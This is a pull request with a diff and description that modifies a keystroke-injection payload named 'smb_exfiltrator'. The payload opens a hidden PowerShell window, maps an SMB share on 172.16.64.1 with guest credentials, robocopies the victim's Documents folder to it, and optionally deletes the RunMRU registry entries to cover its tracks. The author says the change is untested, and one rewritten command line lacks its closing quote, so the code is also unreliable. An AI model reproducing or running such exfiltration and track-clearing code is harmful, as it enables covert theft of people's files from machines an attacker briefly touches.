### PR TITLE
squish 2x 'GUI + R' lines  into 1 line

### DIFF
--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -38,17 +38,22 @@ fi
 # Once found, initiates file copy and exits
 LED R G
 ATTACKMODE HID
-QUACK GUI r
-QUACK DELAY 500
-QUACK STRING PowerShell -WindowStyle Hidden \"Do {Test-NetConnection 192.168.5.60 SMB -InformationLevel quiet} until ($_.TcpTestSucceded); net use \\\172.16.64.1\e guest /USER:guest; robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S\"
-QUACK ENTER
 
-# Clear tracks?
+# Clear tracks = yes
 if [ $CLEARTRACKS == "yes" ]; then
+   QUACK Delay 500
+   QUACK GUI r
+   QUACK DELAY 500
+   QUACK STRING PowerShell -WindowStyle Hidden \"Test-NetConnection 172.16.64.1 SMB;net use \\\172.16.64.1\e guest /USER:guest;robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S\;rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
+   QUACK ENTER
+fi
+
+# Clear tracks = no
+if [ $CLEARTRACKS == "no" ]; then
    QUACK DELAY 500
    QUACK GUI r
    QUACK DELAY 500
-   QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+   QUACK STRING PowerShell -WindowStyle Hidden \"Test-NetConnection 172.16.64.1 SMB;net use \\\172.16.64.1\e guest /USER:guest;robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S\
    QUACK ENTER
 fi
 


### PR DESCRIPTION
Per a comment that i found on the YouTube video by Darren, I decided to try to compress both powershell lines into one line, staying within 260 characters.  There are two changes worth mentioning:
1) I had to do away with the loop.  Too many characters.  On the upside, Test_NetConnection has a timer of 21 seconds where it waits for a response on the specified port (445) before throwing an error and moving to the next line.  I heard in some other video by Darren that it only takes the Bunny 6 seconds to boot.  So presumably this should be alright, but I don't have a bunny to test with.
Note: Test_NetConnection still requires PSv4 (Win8.1 / Server 212R2).
2) Because we no longer have a loop we can count on the script to exit when it reaches the end.  This means we don't care if the last cleanup command fails.  So we can delete '-ErrorAction SilentlyContinue' and trust that our script will still exit.